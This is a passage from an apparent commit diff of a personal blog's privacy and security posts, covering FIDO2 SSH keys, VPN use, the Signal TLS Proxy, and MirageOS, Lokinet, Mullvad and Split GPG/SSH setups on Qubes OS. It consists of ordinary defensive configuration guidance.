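    IdentitiesOnly yes
```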

You can also generate a **resident key** (referred to as a *discoverable credential* in the WebAuthn specification):

```
ssh-keygen -t ed25519-sk -O resident -O application=ssh:user1
```

As you can see, a few options can be specified:

- `-O resident` tells `ssh-keygen` to generate a resident key, meaning that the private "handle" key will also be stored on the security key itself. This has security implications, but you may want it so you can move seamlessly between different computers. In that case, you should absolutely protect your key with a PIN beforehand.
- `-O application=ssh:` instructs the security key to store the resident key under a particular slot, because the security key has to index its resident keys (by default, they use `ssh:` with an empty user ID). If this is not specified, the next key generation might overwrite the previous one.
- `-O verify-required` is optional, but requires a PIN to generate/access the key.

Resident keys can be written to disk using `ssh-keygen -K`, or loaded directly into the SSH agent with `ssh-add -K` if you don't want to write them to disk.

### Server configuration

Next, transfer your public key over to the server (granted you already have access to it with a regular key pair):

```
ssh-copy-id -i ~/.ssh/id_ed25519_sk.pub user@server.domain.tld
```

*Ta-da!* But one last thing: we need to make sure the server supports this public key format in `sshd_config`:

```
PubkeyAcceptedKeyTypes ssh-ed25519,sk-ssh-ed25519@openssh.com
```

Adding `sk-ssh-ed25519@openssh.com` to `PubkeyAcceptedKeyTypes` should suffice (note that this option was renamed to `PubkeyAcceptedAlgorithms` in OpenSSH 8.5). It's best practice to only use the cryptographic primitives that you need, and hopefully modern ones. This isn't a full-on SSH hardening guide, but you should take a look at the [configuration file GrapheneOS uses](https://github.com/GrapheneOS/infrastructure/blob/main/sshd_config) for their servers to get an idea of a few good practices.

Restart the `sshd` service and try to connect to your server using your key handle (by passing `-i ~/.ssh/id_ed25519_sk` to `ssh`, for instance). If that works (your FIDO2 security key should be needed to derive the real secret), feel free to remove your previous keys from `.ssh/authorized_keys` on your server.
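
For instance (reusing the hypothetical host from the `ssh-copy-id` example above):

```
ssh -i ~/.ssh/id_ed25519_sk user@server.domain.tld
```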
## That's cool, right?

If you don't have a security key, you can buy one from [Yubico](https://www.yubico.com/fr/store/) (I'm very happy with my 5C NFC, by the way), [Nitrokey](https://www.nitrokey.com/), [SoloKeys](https://solokeys.com/) or [OnlyKey](https://onlykey.io/), to name a few. If you have an Android device with a hardware security module (HSM), such as the Google Pixels equipped with Titan M (Pixel 3 and later), you can even use it as a Bluetooth security key.

*No reason to miss out on the party if you can afford it!*
7
content/posts/linux/_index.md
Normal file

@@ -0,0 +1,7 @@

---
title: Linux
ShowReadingTime: false
ShowWordCount: false
---

A collection of posts about Linux and related applications
55
content/posts/proxies/Commercial VPN Use Cases.md
Normal file

@@ -0,0 +1,55 @@

---
title: "Commercial VPN Use Cases"
date: 2022-07-19
tags: ['Knowledge base', 'VPN', 'Privacy']
author: Tommy
---

A Virtual Private Network (VPN) is a way of creating a protected and private network over the open Internet. VPNs were originally designed to provide remote access to an internal corporate network. However, in recent years, they have also been used by commercial VPN companies to hide their clients' real IP addresses from third-party websites and services.

## Should I use a VPN?

**Yes**, unless you are already using Tor. A VPN does two things: it shifts the risks from your Internet Service Provider to itself, and it hides your IP address from third-party services.

VPNs cannot encrypt data outside of the connection between your device and the VPN server. VPN providers can see and modify your traffic the same way your ISP could, and there is no way to verify a VPN provider's "no logging" policies.

However, they do hide your actual IP address from third-party services, provided that there are no IP leaks. They help you blend in with others and mitigate IP-based tracking.

## What about encryption?

The encryption offered by VPN providers is between your devices and their servers. It guarantees that this specific link is secure. This is a step up from using unencrypted proxies, where an adversary on the network can intercept and modify the communications between your devices and said proxies. However, the traffic between your apps or browser and the service providers is not covered by this encryption.

In order to keep what you actually do on the websites you visit private and secure, you must use [TLS](https://en.wikipedia.org/wiki/Transport_Layer_Security). This will keep your passwords, session tokens, and queries safe from the VPN provider. Consider enabling "HTTPS everywhere" in your browser to mitigate downgrade attacks like [SSL Strip](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf).

## Should I use encrypted DNS with a VPN?

Unless your VPN provider hosts the encrypted DNS servers, **no**. Using DoH/DoT (or any other form of encrypted DNS) with third-party servers will simply add more entities to trust and does **absolutely nothing** to improve your privacy/security. Your VPN provider can still see which websites you visit based on IP addresses and other methods. Instead of just trusting your VPN provider, you are now trusting both the VPN provider and the DNS provider.

A common reason to recommend encrypted DNS is that it helps against DNS spoofing. However, your browser should already be checking for [TLS certificates](https://en.wikipedia.org/wiki/Transport_Layer_Security#Digital_certificates) with **HTTPS** and warn you about it. If you are not using **HTTPS**, then an adversary can still just modify anything other than your DNS queries and the end result will be little different.

Needless to say, **you shouldn't use encrypted DNS with Tor**. This would direct all of your DNS requests through a single entity and make you stand out from the rest of the Tor users, who use the exit node's DNS configuration.

## What if I need anonymity?

VPNs cannot provide anonymity. Your VPN provider will still see your real IP address, and often has a money trail that can be linked directly back to you. You cannot rely on "no logging" policies to protect your data. Use [Tor](https://www.torproject.org/) instead.

## Should I use Tor over VPN?

By using Tor over VPN, you are essentially adding an extra node at the beginning of the circuit. This provides zero additional benefits to you, while dramatically increasing the latency of your connection. If you wish to hide your Tor usage from your ISP or your government, Tor has a built-in solution for that: Tor bridges.

## What about VPN over Tor?

By using VPN over Tor, you are adding an extra node at the end of a circuit, and that node is always controlled by the same entity. If you pay for the VPN using the traditional banking system, this essentially breaks the anonymity that the three hops in front of it would provide. If you pay for the VPN subscription using cash or a private cryptocurrency like Monero, your privacy is reduced to pseudonymity: the VPN provider still knows that the connections being made come from the same individual, it just does not know who you really are. Even if you are using a free VPN, you would still break [Stream Isolation](https://www.whonix.org/wiki/Stream_Isolation), one of Tor's important anonymity features. There are very few use cases where it would make sense to add a VPN server at the end of the chain.

## What about VPN providers that provide Tor nodes?

Do not use that feature. The point of using Tor is that you do not trust your VPN provider. Currently, Tor only supports the [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) protocol. [UDP](https://en.wikipedia.org/wiki/User_Datagram_Protocol) (used in [WebRTC](https://en.wikipedia.org/wiki/WebRTC) for voice and video sharing, the new [HTTP3/QUIC](https://en.wikipedia.org/wiki/HTTP/3) protocol, etc.), [ICMP](https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol) and other packets will be dropped. To compensate for this, VPN providers typically route all non-TCP packets through their VPN server (your first hop). This is the case with [ProtonVPN](https://protonvpn.com/support/tor-vpn/). Additionally, like VPN over Tor, you lose control over other important Tor features like Stream Isolation.

Thus, this feature should be viewed as a convenient way to access the Tor network, not to stay anonymous. For true anonymity, use the Tor Browser Bundle, TorSocks, or a Tor gateway.

## When are VPNs useful?

A VPN is useful in a variety of scenarios, such as:

- Hiding your traffic from **only** your Internet Service Provider.
- Hiding your downloads (such as torrents) from your ISP and anti-piracy organizations.
- Hiding your IP address from third-party websites and services, preventing IP-based tracking.
20
content/posts/proxies/Update your Signal TLS Proxy.md
Normal file

@@ -0,0 +1,20 @@

---
title: "Update your Signal TLS Proxy"
date: 2022-10-15
tags: ['Applications', 'Linux', 'Container', 'Censorship Evasion']
author: Tommy
---

![Signal](/images/signal.png)

Given the current censorship situation in Iran, I decided to have a look at the [Signal TLS Proxy](https://github.com/signalapp/Signal-TLS-Proxy).

One thing immediately jumped out: the NGINX image has not been updated [for years](https://github.com/signalapp/Signal-TLS-Proxy/blob/ac94d6b869f942ec05d7ef76840287a1d1f487f9/nginx-relay/Dockerfile#L9). In fact, NGINX 1.18 is so old that it has been end-of-life for [a year and a half](https://endoflife.date/nginx) as of this writing.

If you are deploying or maintaining a Signal TLS Proxy, I highly recommend that you use the upstream `nginx:alpine` image instead.
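
If you are patching your own checkout rather than waiting on upstream, the fix amounts to a one-line swap of the base image in `nginx-relay/Dockerfile` (a sketch; it assumes the pinned `FROM nginx:...` line is the only reference that needs changing):

```bash
sed -i 's|^FROM nginx:.*|FROM nginx:alpine|' nginx-relay/Dockerfile
```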

My Docker Compose setup can be found [here](https://github.com/tommytran732/Signal-TLS-Proxy). I have also fixed the missing `:Z` flag for mountpoints and dropped privileges to reduce the attack surface. I made a couple of pull requests for these changes, but Signal has been very slow to review and merge them, so... yeah.

- [Drop capabilities](https://github.com/signalapp/Signal-TLS-Proxy/pull/24)
- [Use upstream NGINX image](https://github.com/signalapp/Signal-TLS-Proxy/pull/23)
- [Add :Z for SELinux](https://github.com/signalapp/Signal-TLS-Proxy/pull/22)
7
content/posts/proxies/_index.md
Normal file

@@ -0,0 +1,7 @@

---
title: Proxies
ShowReadingTime: false
ShowWordCount: false
---

A collection of posts about proxies
97
content/posts/qubes/Firewalling with MirageOS on Qubes OS.md
Normal file

@@ -0,0 +1,97 @@

---
title: "Firewalling with MirageOS on Qubes OS"
date: 2022-08-26
tags: ['Operating Systems', 'MirageOS', 'Qubes OS', 'Security']
author: Tommy
---

![Mirage Firewall](/images/mirage.png)

[MirageOS](https://mirage.io/) is a library operating system with which you can create a unikernel for the sole purpose of acting as Qubes OS's firewall. In this post, I will walk you through how to set this up.

## Advantages

- Small attack surface. The unikernel only contains the minimal set of libraries it needs to function, so it has a much smaller attack surface than a general-purpose operating system like a Linux distribution or OpenBSD.
- Low resource consumption. You only need about 64MB of RAM for each instance of the Mirage firewall.
- Fast startup time.

## Disadvantages

- No official package for Qubes OS. While [Qubes Mirage Firewall](https://github.com/mirage/qubes-mirage-firewall) is still maintained, it rarely gets an official release, so you need to follow the development process on GitHub and make a new build yourself whenever there is a new commit.
- Does not work well with the Windows PV network driver. With that being said, the Windows PV network driver is pretty buggy on its own, and I don't recommend that you use it anyways.

### Prebuilt Image

You can obtain a prebuilt image of MirageOS [here](https://github.com/tommytran732/QubesOS-Scripts/tree/main/mirageos). I follow the development of Qubes Mirage Firewall (since I use it on my personal computer) and will be uploading builds frequently.

### Building Mirage-Firewall Yourself

First, make sure that you have Docker installed on your system. Then, run the following commands:

```bash
git clone https://github.com/palainp/qubes-mirage-firewall/
cd qubes-mirage-firewall
git checkout mirage4
sudo ./build-with-docker.sh
```

Once the build process finishes, the unikernel should be at `~/qubes-mirage-firewall/_build/mirage-firewall/vmlinuz`.

## Deploy

First, you need to copy the unikernel to `/var/lib/qubes/vm-kernels/mirage-firewall` in `dom0` and create a dummy `initramfs`:

```bash
mkdir -p /var/lib/qubes/vm-kernels/mirage-firewall/
cd /var/lib/qubes/vm-kernels/mirage-firewall/
qvm-run -p your_appvm_name 'cat /path/to/the/vmlinuz/file' > vmlinuz
gzip -n9 < /dev/null > initramfs
```

### TemplateVM

Create a TemplateVM:

```bash
qvm-create \
  --property kernel=mirage-firewall \
  --property kernelopts='' \
  --property memory=128 \
  --property maxmem=128 \
  --property vcpus=1 \
  --property virt_mode=pvh \
  --label=black \
  --class TemplateVM \
  your_template_name
```

Don't worry if the TemplateVM doesn't launch - we don't need it to.

### Disposable Template

Next, create a disposable template based on the TemplateVM you have just created:

```bash
qvm-create \
  --property template=your_template_name \
  --property provides_network=True \
  --property template_for_dispvms=True \
  --label=orange \
  --class AppVM \
  your_disposable_template_name

qvm-features your_disposable_template_name qubes-firewall 1
qvm-features your_disposable_template_name no-default-kernelopts 1
```

Your disposable templates should now launch and shut down properly.

### Disposable FirewallVMs

You can now create disposable FirewallVMs based on your disposable template. I recommend replacing `sys-firewall` with a disposable Mirage firewall. If you use ProxyVMs like `sys-whonix`, I recommend that you add a disposable Mirage firewall after the ProxyVM as well, and use it as the net qube for your AppVMs.

```bash
qvm-create \
  --property template=your_disposable_template_name \
  --property provides_network=True \
  --property netvm=your_net_qube_name \
  --label=orange \
  --class DispVM \
  your_firewall_name
```
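
Once the firewall qube exists, you can point other qubes at it from `dom0` (a quick sketch; the VM names are placeholders):

```bash
qvm-prefs your_appvm_name netvm your_firewall_name
```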

74
content/posts/qubes/Using Lokinet on Qubes OS.md
Normal file

@@ -0,0 +1,74 @@

---
title: "Using Lokinet on Qubes OS"
date: 2022-07-27
tags: ['Applications', 'Qubes OS', 'Anonymity', 'Privacy']
author: Tommy
---

![Lokinet](/images/lokinet.png)

[Lokinet](https://lokinet.org) is an Internet overlay network utilizing onion routing to provide anonymity for its users, similar to the Tor network. This post will provide a quick (and non-exhaustive) list of its [pros](#advantages) and [cons](#disadvantages) from an end-user perspective and go over how to set it up on Qubes OS.

## Advantages

- Provides anonymity by removing trust in a service provider (as opposed to a traditional VPN)
- Better versatility than Tor by supporting any IP-based protocol (Tor only supports TCP)
- Generally faster speeds than the Tor network

## Disadvantages

- Only works well on Debian-based distributions. The client for Windows has DNS leaks, and support for macOS, Android, and other Linux distributions is experimental. It should be noted that this is a problem with the official client, not the protocol itself.
- Does not have a kill switch, which could lead to accidental leaks (as opposed to common commercial VPN clients, which lock connections to just the provider's servers).
- The official client requires the user to manually define an exit node, or to set certain IP ranges to be routed through certain exit nodes. While this makes it possible to set up some form of Stream Isolation, it is not as good as Tor's `IsolateDestAddr` and `IsolateDestPort`, which automatically isolate every destination address/port to its own circuit.
- DNS does not work when Lokinet is used in a ProxyVM on Qubes OS

## Creating the TemplateVM

As mentioned [above](#disadvantages), the Lokinet client only works well with Debian-based distributions. This means that our template will have to be one of the Debian-based ones, and I would highly recommend that you convert the official Debian template by the Qubes OS team into a KickSecure template to use as a base. KickSecure reduces the attack surface of Debian with a substantial set of hardening configurations, and a nice feature to go with an anonymity network like Lokinet is [Boot Clock Randomization](https://www.kicksecure.com/wiki/Boot_Clock_Randomization), which helps defend against [time-based deanonymization attacks](https://www.whonix.org/wiki/Time_Attacks). You will only need the `kicksecure-cli` meta package (`kicksecure-gui` is unnecessary), and experimental services like `proc-hidepid`, `hide-hardware-info` and `permission-hardening` work just fine with the Lokinet client. [Hardened Malloc](https://www.kicksecure.com/wiki/Hardened_Malloc) and [LKRG](https://www.kicksecure.com/wiki/Linux_Kernel_Runtime_Guard_LKRG) do not cause any problems with Lokinet, either.

Since DNS with Lokinet does not work if it is installed inside of a ProxyVM, we will need to have Lokinet running inside the same AppVM as the applications you intend to run. This is less than ideal, as a compromised AppVM could reveal your IP address. Beyond that, accidental leaks can happen, too.

A potential solution to this problem is to set up an unbound server or a firewall script in the ProxyVM redirecting all DNS traffic to Lokinet's DNS server at `127.3.2.1:53`; however, I have been unable to get this working. Another solution is to simply override the DNS server inside the AppVM with a custom DNS server, but this will make you stand out and break `.loki` DNS resolution. Websites like [DNS leak test](https://dnsleaktest.com) can observe which DNS server you are actually using and potentially fingerprint you. For the same reason that you should not use custom DNS servers when connected to the Tor network, you really should not use a custom DNS server when connected to Lokinet.

Start by importing Oxen's PGP key:

`sudo curl --proxy http://127.0.0.1:8082 -so /etc/apt/trusted.gpg.d/oxen.gpg https://deb.oxen.io/pub.gpg`

Then, add Oxen's Debian repository:

`echo "deb https://deb.oxen.io $(lsb_release -sc) main" | sudo tee /etc/apt/sources.list.d/oxen.list`

Next, update the repositories:

`sudo apt update`

If updates for your packages are found, **DO NOT** attempt to upgrade them directly. Instead, use the Qubes Updater to update the TemplateVM.

When you are done, install `lokinet-gui` and `resolvconf`:

`sudo apt install lokinet-gui resolvconf`

Note that you **must** install `resolvconf` to get DNS working.

Next, edit `/var/lib/lokinet/lokinet.ini` and add the exit server you want to use:

`exit-node=exit.loki`

Note that I am using `exit.loki` here, as it is the one mentioned in the [Lokinet documentation](https://docs.oxen.io/products-built-on-oxen/lokinet/exit-nodes). There are some other exit servers listed on [probably.loki](http://probably.loki/wiki/index.php?title=Exit_Nodes) as well, and for your convenience, I will just copy-paste them here:

- `exit.loki` (USA, run by Jeff)
- `exit2.loki` (USA, run by Jeff, same IP as exit.loki)
- `xite.loki` (Iceland, run by Loutchi)
- `peter.loki` (USA, run by peter)
- `secret.loki` (Netherlands, run by Secret)

Finally, enable the `lokinet` service:

`systemctl enable lokinet`

## Creating the AppVM

Just create the AppVM as usual, and you should be good to go. There are a few things to keep in mind, though:

- You should probably set networking to use `sys-firewall`. I have tested using my ProtonVPN ProxyVM for networking, and DNS was not working. Besides, it makes little sense to attempt such a setup anyway, unless you are worried about accidental leaks or a compromised AppVM.
- You should give the AppVM the `network-manager` service so that Lokinet can set up networking properly and get DNS working (see the sketch below).
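
In `dom0`, granting that service amounts to something like the following (a sketch; `your_appvm_name` is a placeholder):

`qvm-features your_appvm_name service.network-manager 1`
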
71
content/posts/qubes/Using Mullvad VPN on Qubes OS.md
Normal file

@@ -0,0 +1,71 @@

---
title: "Using Mullvad VPN on Qubes OS"
date: 2022-09-03
tags: ['Applications', 'Qubes OS', 'Privacy']
author: Tommy
---

![Mullvad](/images/mullvad.png)

Mullvad is a fairly popular and generally trustworthy VPN provider. In this post, I will walk you through how to use the official Mullvad client in a ProxyVM on Qubes OS. This method is a lot more convenient than the [official guide](https://mullvad.net/en/help/qubes-os-4-and-mullvad-vpn/) from Mullvad (which recommends that you manually load in OpenVPN or WireGuard profiles) and will let you seamlessly switch between different locations and network setups just as you would on a normal Linux installation.

## Preparing your TemplateVM

I recommend that you make a new TemplateVM based on the latest Fedora template and remove all the unnecessary packages that you might not use. This way, you can minimize the attack surface while not having to deal with missing dependencies like on a minimal template. With that being said, if you do manage to get the minimal template fully working with Mullvad, feel free to [open a discussion on GitHub](https://github.com/orgs/PrivSec-dev/discussions) or [contact me directly](https://tommytran.io/contact) and I will update the post accordingly.

This is what I run on my template to trim it down:

```bash
sudo dnf remove firefox thunderbird totem gnome-remote-desktop gnome-calendar gnome-disk-utility gnome-calculator gnome-connections gnome-weather gnome-contacts gnome-clocks gnome-maps gnome-screenshot gnome-logs gnome-characters gnome-font-viewer gnome-color-manager simple-scan keepassxc cheese baobab yelp evince* httpd mozilla* cups rygel -y
sudo dnf autoremove -y
```

Next, you need to create the bind directories for Mullvad's configuration, so that it persists across reboots of the qube:

```bash
sudo mkdir -p /etc/qubes-bind-dirs.d
sudo tee /etc/qubes-bind-dirs.d/50_user.conf << EOF > /dev/null
binds+=( '/etc/mullvad-vpn' )
EOF
```
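
If you later want to confirm that the bind took effect, the persistent copy lives under `/rw/bind-dirs` inside the qube (a quick check, assuming the default bind-dirs layout):

```bash
ls /rw/bind-dirs/etc/mullvad-vpn
```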

## Installing the Mullvad App

Inside of the TemplateVM you have just created, do the following:

```bash
sudo dnf install https://mullvad.net/media/app/MullvadVPN-2022.5_x86_64.rpm
sudo systemctl enable mullvad-daemon
```

Replace `https://mullvad.net/media/app/MullvadVPN-2022.5_x86_64.rpm` with whatever the latest URL for the Mullvad app is. I will try to keep this post updated with the accurate command, but you should just take the URL from [their website](https://mullvad.net/en/download/linux/).


|
||||
|
||||
Shutdown the TemplateVM:
|
||||
|
||||
```bash
|
||||
sudo shutdown now
|
||||
```
|
||||
|
||||
## Creating the ProxyVM

Create an AppVM based on the TemplateVM you have just created. Set `sys-firewall` (or whatever FirewallVM you have connected to your `sys-net`) as the net qube. If you do not have such a FirewallVM, use `sys-net` as the net qube. Next, go to the advanced tab and tick the `provides network access to other qubes` box.

![Mullvad ProxyVM](/images/mullvad-proxyvm.png)

Edit `/rw/config/rc.local` to work around [issue 3803](https://github.com/mullvad/mullvadvpn-app/issues/3803):

```bash
echo "sleep 10 # Wait a bit so that Mullvad can establish the connection
/usr/lib/qubes/qubes-setup-dnat-to-ns" | sudo tee -a /rw/config/rc.local
```
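
Once you have logged in and connected in the app, you can sanity-check the tunnel from a terminal inside the ProxyVM (assuming the `mullvad` CLI that ships with the app):

```bash
mullvad status
```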

You can now use this ProxyVM as the net qube for other qubes!

## Notes

With this current setup, the ProxyVM you have just created will be responsible for handling firewall rules for the qubes behind it. This is not ideal, as it is still a fairly large VM, and there is a risk that Mullvad or some other app may interfere with its firewall handling.

Instead, I highly recommend that you [create a minimal Mirage FirewallVM](/posts/os/firewalling-with-mirageos-on-qubes-os/) and use it as a firewall **behind** the Mullvad ProxyVM. Other AppVMs should then use the Mirage firewall as their net qube. This way, you can make sure that firewall rules are properly enforced.

![Mullvad Mirage](/images/mullvad-mirage.png)

@@ -0,0 +1,86 @@

---
title: "Using Split GPG and Split SSH on Qubes OS"
date: 2022-08-13
tags: ['Operating Systems', 'Qubes OS', 'Security']
author: Tommy
---

![Qubes](/images/qubes.png)

This post will go over setting up Split GPG, then setting up Split SSH with the same PGP keys. Effectively, we are emulating what you can do with a PGP smartcard on Qubes OS.

## Split GPG

Follow the official Qubes OS [documentation](https://www.qubes-os.org/doc/split-gpg/) to set this up.

Note that if you already have a PGP key with a passphrase, you can remove it by installing `pinentry-gtk` in `vault`'s TemplateVM, then running `gpg2 --edit-key <key_id>` and `passwd` to set an empty passphrase. The default non-graphical pinentry will just loop infinitely and will not let you set an empty passphrase.

## Split SSH

This part is based on the Qubes Community's [guide](https://github.com/Qubes-Community/Contents/blob/master/docs/configuration/split-ssh.md); however, I will deviate from it to use the PGP keys for SSH instead of generating a new key pair.

### In `dom0`

- Create `/etc/qubes-rpc/policy/qubes.SshAgent` with `@anyvm @anyvm ask,default_target=vault` as the content. Since the keys are not passphrase-protected, you should **not** set the policy to allow.

### In the `vault` AppVM

- Add `enable-ssh-support` to the end of `~/.gnupg/gpg-agent.conf`
- Get your keygrip with `gpg --with-keygrip -k`
- Add your keygrip to the end of `~/.gnupg/sshcontrol` (see the sketch below)

![Keygrip](/images/keygrip.png)
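
For reference, appending a keygrip can look like this (a sketch; the keygrip value here is made up):

```bash
echo "A1B2C3D4E5F6A7B8C9D0E1F2A3B4C5D6E7F8A9B0" >> ~/.gnupg/sshcontrol
```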

### In `vault`'s TemplateVM

- Create `/etc/qubes-rpc/qubes.SshAgent` with the following content:

```bash
#!/bin/sh
# Qubes App Split SSH Script

# Activate the GPG agent and set the correct SSH socket
export SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket)
gpgconf --launch gpg-agent

# Safeguard - Qubes notification bubble for each SSH request
notify-send "[$(qubesdb-read /name)] SSH agent access from: $QREXEC_REMOTE_DOMAIN"

# SSH connection
socat - "UNIX-CONNECT:$SSH_AUTH_SOCK"
```

- Make it executable with `sudo chmod +x /etc/qubes-rpc/qubes.SshAgent`
- Turn off the TemplateVM. If the `vault` VM is running, shut it down, then start it again to update the VM's configuration.

### In the `ssh-client` AppVM

- Add the following to the end of `/rw/config/rc.local`:

```bash
# SPLIT SSH CONFIGURATION >>>
# Replace "vault" with the name of the AppVM which stores your SSH private key(s)
SSH_VAULT_VM="vault"

if [ "$SSH_VAULT_VM" != "" ]; then
  export SSH_SOCK="/home/user/.SSH_AGENT_$SSH_VAULT_VM"
  rm -f "$SSH_SOCK"
  sudo -u user /bin/sh -c "umask 177 && exec socat 'UNIX-LISTEN:$SSH_SOCK,fork' 'EXEC:qrexec-client-vm $SSH_VAULT_VM qubes.SshAgent'" &
fi
# <<< SPLIT SSH CONFIGURATION
```

- Add the following to the end of `~/.bashrc`:

```bash
# SPLIT SSH CONFIGURATION >>>
# Replace "vault" with the name of the AppVM which stores your SSH private key(s)
SSH_VAULT_VM="vault"

if [ "$SSH_VAULT_VM" != "" ]; then
  export SSH_AUTH_SOCK="/home/user/.SSH_AGENT_$SSH_VAULT_VM"
fi
# <<< SPLIT SSH CONFIGURATION
```

- Restart `ssh-client` and confirm that it's working with `ssh-add -L`.

### Limitations

A malicious `ssh-client` AppVM can hold onto the ssh-agent connection for more than one use until it is shut down. While your private key is protected, a malicious actor with access to the AppVM can still abuse the ssh-agent to log into your servers.
7
content/posts/qubes/_index.md
Normal file

@@ -0,0 +1,7 @@

---
title: Qubes OS
ShowReadingTime: false
ShowWordCount: false
---

A collection of posts about Qubes OS and related applications